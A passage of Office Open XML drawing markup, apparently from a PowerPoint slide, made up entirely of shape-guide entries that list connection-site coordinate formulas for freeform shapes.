              <a:gd name="connsiteY99" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 504338 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 459990 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY15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690830 w 1605470"/>
              <a:gd name="connsiteY74" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 692428 w 1605470"/>
              <a:gd name="connsiteY75" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 685850 w 1605470"/>
              <a:gd name="connsiteY76" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 687181 w 1605470"/>
              <a:gd name="connsiteY77" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 691535 w 1605470"/>
              <a:gd name="connsiteY78" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 696613 w 1605470"/>
              <a:gd name="connsiteY79" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 719207 w 1605470"/>
              <a:gd name="connsiteY80" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 718632 w 1605470"/>
              <a:gd name="connsiteY81" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 718939 w 1605470"/>
              <a:gd name="connsiteY82" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 718966 w 1605470"/>
              <a:gd name="connsiteY83" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 717581 w 1605470"/>
              <a:gd name="connsiteY84" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 716465 w 1605470"/>
              <a:gd name="connsiteY85" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 718198 w 1605470"/>
              <a:gd name="connsiteY86" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 721941 w 1605470"/>
              <a:gd name="connsiteY87" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 721407 w 1605470"/>
              <a:gd name="connsiteY88" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 730103 w 1605470"/>
              <a:gd name="connsiteY89" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 737449 w 1605470"/>
              <a:gd name="connsiteY90" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 736745 w 1605470"/>
              <a:gd name="connsiteY91" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 740188 w 1605470"/>
              <a:gd name="connsiteY92" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 747726 w 1605470"/>
              <a:gd name="connsiteY93" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY94" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY95" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY96" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 504338 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 459990 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY15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690830 w 1605470"/>
              <a:gd name="connsiteY74" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 692428 w 1605470"/>
              <a:gd name="connsiteY75" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 685850 w 1605470"/>
              <a:gd name="connsiteY76" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 687181 w 1605470"/>
              <a:gd name="connsiteY77" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 691535 w 1605470"/>
              <a:gd name="connsiteY78" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 696613 w 1605470"/>
              <a:gd name="connsiteY79" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 719207 w 1605470"/>
              <a:gd name="connsiteY80" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 718632 w 1605470"/>
              <a:gd name="connsiteY81" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 718939 w 1605470"/>
              <a:gd name="connsiteY82" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 718966 w 1605470"/>
              <a:gd name="connsiteY83" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 717581 w 1605470"/>
              <a:gd name="connsiteY84" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 716465 w 1605470"/>
              <a:gd name="connsiteY85" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 718198 w 1605470"/>
              <a:gd name="connsiteY86" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 721941 w 1605470"/>
              <a:gd name="connsiteY87" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 721407 w 1605470"/>
              <a:gd name="connsiteY88" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 730103 w 1605470"/>
              <a:gd name="connsiteY89" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 737449 w 1605470"/>
              <a:gd name="connsiteY90" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 736745 w 1605470"/>
              <a:gd name="connsiteY91" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 740188 w 1605470"/>
              <a:gd name="connsiteY92" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 747726 w 1605470"/>
              <a:gd name="connsiteY93" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY94" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY95" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY96" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 504338 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 459990 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 201434 w 1605470"/>
